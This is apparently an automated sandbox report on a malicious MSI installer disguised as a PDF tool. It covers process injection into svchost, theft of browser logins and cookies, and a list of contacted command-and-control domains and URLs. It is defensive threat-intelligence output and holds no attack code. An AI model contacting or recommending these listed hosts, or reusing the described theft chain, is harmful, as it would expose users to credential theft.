Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Modify Registry 1 | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Virtualization/Sandbox Evasion 131 | Network Sniffing | Application Window Discovery 11 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Access Token Manipulation 11 | Input Capture | System Owner/User Discovery 2 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection 823 | Keylogging | Remote System Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Bootkit 1 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Rundll32 1 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | Internal Defacement
Hardware Additions | JavaScript/JScript | Valid Accounts | Dynamic-link Library Injection | Indicator Removal on Host 1 | Credential API Hooking | System Information Discovery | Exploit Enterprise Resources | Remote Email Collection | Alternate Network Mediums | External Proxy | External Defacement

Behavior Graph

Behavior Graph ID: 508222; Sample: 6rfyiAq0nM; Start date: 24/10/2021; Architecture: WINDOWS; Score: 74

Signatures on the sample:
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Multi AV Scanner detection for domain / URL
  • Multi AV Scanner detection for dropped file
  • 3 other signatures

Process tree (started / injected processes, dropped files, contacted hosts and per-process signatures):
  • msiexec.exe (started)
    • dropped: C:\Windows\Installer\MSIFBC3.tmp, PE32
    • signature: Drops executables to the windows directory (C:\Windows) and starts them
    • MSIFBC3.tmp (started)
      • dropped: C:\Users\user\AppData\Local\...\MSIFBC3.tmp, PE32
      • MSIFBC3.tmp (started)
        • dropped: C:\Program Files (x86)\...\is-VR0CA.tmp, PE32
        • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        • dropped: C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32
        • dropped: 13 other files (none is malicious)
        • rundll32.exe (started)
          • signatures: Contains functionality to infect the boot sector; Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes; 5 other signatures
          • svchost.exe (injected)
            • signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to infect the boot sector; Contains functionality to inject threads in other processes; 5 other signatures
            • svchost.exe (started)
              • DNS/IP: toa.mygametoa.com 34.64.183.91 (GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States)
              • DNS/IP: 208.95.112.1 (TUT-ASUS, United States)
              • 3 other IPs or domains
              • dropped: C:\Users\user\AppData\...\Login Data.tmp, SQLite
              • dropped: C:\Users\user\AppData\Local\...\Cookies.tmp, SQLite
              • signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal browser information (history, passwords, etc)
          • svchost.exe (injected)
          • svchost.exe (injected)
          • 14 other processes
  • msiexec.exe (started)

Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
6rfyiAq0nM.msi | 31% | Virustotal |
6rfyiAq0nM.msi | 8% | Metadefender |
6rfyiAq0nM.msi | 36% | ReversingLabs | Win32.Trojan.Waldek

Dropped Files

Source | Detection | Scanner | Label
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy) | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy) | 0% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp | 5% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp | 0% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp | 0% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp | 4% | ReversingLabs |
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp | 9% | Metadefender |
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp | 26% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE Files

Source | Detection | Scanner | Label
13.2.rundll32.exe.4eb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.2.svchost.exe.1afba170000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.2.svchost.exe.1d91aad0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.0.svchost.exe.1111ac00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
24.0.svchost.exe.1dc51fb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.2.svchost.exe.1111ac00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
24.2.svchost.exe.1dc51fb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.0.svchost.exe.1afba170000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.2.svchost.exe.1be5cd40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.0.svchost.exe.204f3380000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.2.svchost.exe.2743a320000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.2.svchost.exe.202b28f0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
16.2.svchost.exe.12e17870000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.0.svchost.exe.202b28f0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
19.2.svchost.exe.233426d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.2.svchost.exe.28621cd0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.0.svchost.exe.22f12740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.2.svchost.exe.22f12740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
31.2.svchost.exe.21c23140000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.0.svchost.exe.28621cd0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.0.svchost.exe.2743a320000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
31.0.svchost.exe.21c23140000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.2.svchost.exe.204f3380000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
21.0.svchost.exe.2f2c5c00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
38.0.svchost.exe.25c96c80000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.2.svchost.exe.2216b8b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.0.svchost.exe.1be5cd40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.0.svchost.exe.222cab20000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.2.svchost.exe.222cab20000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
14.2.svchost.exe.24b7d0d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
19.0.svchost.exe.233426d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
21.2.svchost.exe.2f2c5c00000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
38.2.svchost.exe.25c96c80000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.0.svchost.exe.2216b8b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
14.0.svchost.exe.24b7d0d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.0.svchost.exe.1d91aad0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2

Domains

Source | Detection | Scanner | Label
toa.mygametoa.com | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https:///xboxlive.com | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://fg.mygameagend.com/report7.4.php | 6% | Virustotal |
https://fg.mygameagend.com/report7.4.php | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/ | 0% | Avira URL Cloud | safe
https:///live.com | 0% | Avira URL Cloud | safe
https://fg.mygameagend.com/ | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
https://www.remobjects.com/ps | 0% | URL Reputation | safe
http://subca.ocsp-certum.com01 | 0% | URL Reputation | safe
https://www.innosetup.com/ | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
https://jrsoftware.org0 | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/report7.4.phpile | 0% | Avira URL Cloud | safe
https://login.windows.netll | 0% | Avira URL Cloud | safe
https://login.windows.netm | 0% | Avira URL Cloud | safe
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d | 0% | Avira URL Cloud | safe
https://login.windows.netB7E5B | 0% | Avira URL Cloud | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://w.ijg. | 0% | Avira URL Cloud | safe
https://bh.mygameadmin.com/report7.4.php | 0% | Avira URL Cloud | safe
https://p-api.com/json/?fields=8198 | 0% | Avira URL Cloud | safe
http://cscasha2.ocsp-certum.com04 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
https:///windows.net | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://fg.mygameagend.com/dll | 0% | Avira URL Cloud | safe
https://xsts.auth.xboxlive.com2 | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
toa.mygametoa.com | 34.64.183.91 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://fg.mygameagend.com/report7.4.php | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
https://bh.mygameadmin.com/report7.4.php | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | MSIFBC3.tmp, 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, 6rfyiAq0nM.msi | false | | high
https://login.windows.net | svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_realaudio/vnd.rn-realaudiovideo/vnd.rn-realvideoaudio/x- | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https:///xboxlive.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://support.google.com/chrome/?p=plugin_javaapplication/x-java-appletapplication/x-java-applet;j | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://repository.certum.pl/cscasha2.cer0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_wmp | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://ocsp.sectigo.com0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_pdfapplication/pdfapplication/vnd.adobe.x-marsapplicatio | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://forms.real.com/real/realone/download.html?type=rpsp_ushttp://service.real.com/realplayer/secu | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/answer/6258784 | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://xsts.auth.xboxlive.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_quicktimeapplication/sdpapplication/x-mpegapplication/x- | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_flash | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://bh.mygameadmin.com/ | svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_java | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | MSIFBC3.tmp | false | | high
https:///live.com | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://support.google.com/chrome/?p=plugin_real | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://fg.mygameagend.com/ | svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.remobjects.com/ps | MSIFBC3.tmp, MSIFBC3.tmp.10.dr | false | URL Reputation: safe | unknown
http://subca.ocsp-certum.com01 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://www.innosetup.com/ | MSIFBC3.tmp, MSIFBC3.tmp, 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, MSIFBC3.tmp.10.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_pdf | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0D | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_divx | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://jrsoftware.org0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | Avira URL Cloud: safe | unknown
https://jrsoftware.org/ | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://bh.mygameadmin.com/report7.4.phpile | svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://forms.real.com/real/realone/download.html?type=rpsp_us | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://www.certum.pl/CPS0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://login.windows.netll | svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://login.windows.netm | svchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d | svchost.exe | false | Avira URL Cloud: safe | unknown
https://login.windows.netB7E5B | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://repository.certum.pl/ctnca.cer09 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://support.google.com/chrome/?p=plugin_quicktime | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid8.9mverp=https://bh. | svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp | false | | high
http://crl.certum.pl/ctnca.crl0k | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exerequires_authorizationstatus | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000011.00000002.533096417.00000204EFAAD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://w.ijg. | is-30MA7.tmp.11.dr, is-UKPSI.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://support.google.com/chrome/?p=plugin_divxvideo/x-matroskavideo/divx | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://www.certum.pl/CPS0 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
http://crl.certum.pl/cscasha2.crl0q | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | | high
https://login.windows.net/7E5B | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp | false | | high
https://p-api.com/json/?fields=8198 | svchost.exe, 00000010.00000003.421876578.0000012E1764D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://cscasha2.ocsp-certum.com04 | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr | false | URL Reputation: safe | unknown
https://login.windows.net/ | svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmp | false | | high
http://service.real.com/realplayer/security/02062012_player/en/ | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_shockwaveapplication/x-director | svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp | false
                                                                      high
                                                                      https://support.google.com/chrome/?p=plugin_shockwavesvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://ip-api.com/json/?fields=8198svchost.exefalse
                                                                          high
                                                                          https:///windows.netsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://fg.mygameagend.com/dllsvchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.google.com/chrome/?p=plugin_wmpWindowssvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://www.instagram.com/accounts/edit/svchost.exefalse
                                                                              high
                                                                              https://xsts.auth.xboxlive.com2svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://support.google.com/chrome/?p=plugin_flashapplication/futuresplashapplication/x-shockwave-flasvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://xsts.auth.xboxlive.com/svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                                  high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | unknown | United States | 53334 | TUT-ASUS | false
172.67.167.122 | unknown | United States | 13335 | CLOUDFLARENETUS | false
34.64.183.91 | toa.mygametoa.com | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | true
104.21.75.46 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 508222
Start date: 24.10.2021
Start time: 12:48:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 6rfyiAq0nM (renamed file extension from none to msi)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal74.troj.spyw.evad.winMSI@10/39@2/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 26.2% (good quality ratio 22.7%)
• Quality average: 60.6%
• Quality standard deviation: 33.8%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
12:50:06 | API Interceptor | 68x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
208.95.112.1 | NaVEQ76t88.exe | malicious | ip-api.com/json/
208.95.112.1 | 7PPXbfDkRN.exe | malicious | ip-api.com/json/
208.95.112.1 | kBbwXpCn0c.exe | malicious | ip-api.com/json/
208.95.112.1 | 13294_Video_Oynat#U0131c#U0131.apk | malicious | ip-api.com/json
208.95.112.1 | Comprobante de pago.xls | malicious | ip-api.com/json/
208.95.112.1 | Comprobante de pago.doc | malicious | ip-api.com/json/
208.95.112.1 | Pv9HB349oG.exe | malicious | ip-api.com/json
208.95.112.1 | PozfYoUNtW.exe | malicious | ip-api.com/json
208.95.112.1 | DiscordSniper.exe | malicious | ip-api.com//json/102.129.143.33
208.95.112.1 | Nightmare Booter (DDos) [IP Stresser] (1).exe | malicious | ip-api.com//json/102.129.143.33
208.95.112.1 | HazardNuker.exe | malicious | ip-api.com/line/?fields=hosting
208.95.112.1 | 2wY8F2BCNp.exe | malicious | ip-api.com/json
208.95.112.1 | 7WVpng6phO.exe | malicious | ip-api.com/json/
208.95.112.1 | Comprobante de pago (OCT).xls | malicious | ip-api.com/json/
208.95.112.1 | tywt33OZI0.exe | malicious | ip-api.com/json
208.95.112.1 | 7mqSo6rtA0.exe | malicious | ip-api.com/json
208.95.112.1 | nIXnNtZvtI.exe | malicious | ip-api.com/json/
208.95.112.1 | nKnpb3gEQR.exe | malicious | ip-api.com/json/
208.95.112.1 | Xg4Pb7Cx99.exe | malicious | ip-api.com/json
208.95.112.1 | z7PRVhbVyw.exe | malicious | ip-api.com/json

Domains

Match | Associated Sample Name / URL | Detection | Context
toa.mygametoa.com | qx881BiW17.exe | malicious | 34.64.183.91
toa.mygametoa.com | 1FR4w7fupN.exe | malicious | 34.64.183.91
toa.mygametoa.com | TXlftr6Hv6.exe | malicious | 34.64.183.91
toa.mygametoa.com | TcTyP2kvmh.exe | malicious | 34.64.183.91
toa.mygametoa.com | pVdP9RRNeY.exe | malicious | 34.64.183.91
toa.mygametoa.com | ZEKk2t5fJt.exe | malicious | 34.64.183.91
toa.mygametoa.com | dBJ2dwRpl5.exe | malicious | 34.64.183.91
toa.mygametoa.com | Fr6yaDjoE5.exe | malicious | 34.64.183.91
toa.mygametoa.com | 9ubsb7p6h1.exe | malicious | 34.64.183.91
toa.mygametoa.com | AeXXqhQNJKur7teIlOrvF329.exe | malicious | 34.64.183.91
toa.mygametoa.com | uFvG6DlSUpNCq_0a0Y3vNrYQ.exe | malicious | 34.64.183.91
toa.mygametoa.com | UfZQclP1sP8dkdmyrez2O3E7.exe | malicious | 34.64.183.91
toa.mygametoa.com | setup_x86_x64_install.exe | malicious | 34.64.183.91
toa.mygametoa.com | TNIZtb3HS3.exe | malicious | 34.64.183.91
toa.mygametoa.com | setup_x86_x64_install.exe | malicious | 34.64.183.91
toa.mygametoa.com | setup_x86_x64_install.exe | malicious | 34.64.183.91
toa.mygametoa.com | yT6sVqj4WT.exe | malicious | 34.64.183.91
toa.mygametoa.com | 28jJSvNzXz.exe | malicious | 34.64.183.91
toa.mygametoa.com | 82Iqbsw9vI.exe | malicious | 34.64.183.91

ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | Qxioyfdvub.dll | malicious | 172.67.69.19
CLOUDFLARENETUS | r7gJpNwSL8.exe | malicious | 162.159.134.233
CLOUDFLARENETUS | qx881BiW17.exe | malicious | 104.21.85.99
CLOUDFLARENETUS | Minutes of Meeting 23.10.2021.exe | malicious | 172.67.218.79
CLOUDFLARENETUS | 021d14981d2829df6914d5c43e9aed8b8c7a80f2d7e03.exe | malicious | 104.21.57.122
CLOUDFLARENETUS | A8mFRoXAow.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | pe8mHCKX5x.exe | malicious | 104.21.66.135
CLOUDFLARENETUS | a91bc84dd26784dc82b1ee55b50dc3016738a09fa0f6c.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | Xnzm5rS5hN.dll | malicious | 172.67.70.134
CLOUDFLARENETUS | FoxMod.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | Far Cry 6.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | Installer Far Cry 6.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | 1mOcqzZcoH.exe | malicious | 104.21.57.252
CLOUDFLARENETUS | 365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe | malicious | 104.21.51.48
CLOUDFLARENETUS | H1GC5Z4C39PAYMENTRECEIPT.exe | malicious | 162.159.135.233
CLOUDFLARENETUS | setup_x86_x64_install.exe | malicious | 162.159.134.233
CLOUDFLARENETUS | Loader.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | Bitcoin Mining Software 1.5v.exe | malicious | 162.159.130.233
CLOUDFLARENETUS | HWIDSpoofer.exe | malicious | 162.159.135.233
TUT-ASUS | NaVEQ76t88.exe | malicious | 208.95.112.1
TUT-ASUS | 7PPXbfDkRN.exe | malicious | 208.95.112.1
TUT-ASUS | kBbwXpCn0c.exe | malicious | 208.95.112.1
TUT-ASUS | C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exe | malicious | 208.95.112.1
TUT-ASUS | setup_x86_x64_install.exe | malicious | 208.95.112.1
TUT-ASUS | 13294_Video_Oynat#U0131c#U0131.apk | malicious | 208.95.112.1
TUT-ASUS | Fri051e1e7444.exe | malicious | 208.95.112.1
TUT-ASUS | Comprobante de pago.xls | malicious | 208.95.112.1
TUT-ASUS | Comprobante de pago.doc | malicious | 208.95.112.1
TUT-ASUS | wA5D1yZuTf.exe | malicious | 208.95.112.1
TUT-ASUS | Pv9HB349oG.exe | malicious | 208.95.112.1
TUT-ASUS | setup_x86_x64_install.exe | malicious | 208.95.112.1
TUT-ASUS | PozfYoUNtW.exe | malicious | 208.95.112.1
TUT-ASUS | DiscordSniper.exe | malicious | 208.95.112.1
TUT-ASUS | Nightmare Booter (DDos) [IP Stresser] (1).exe | malicious | 208.95.112.1
TUT-ASUS | HazardNuker.exe | malicious | 208.95.112.1
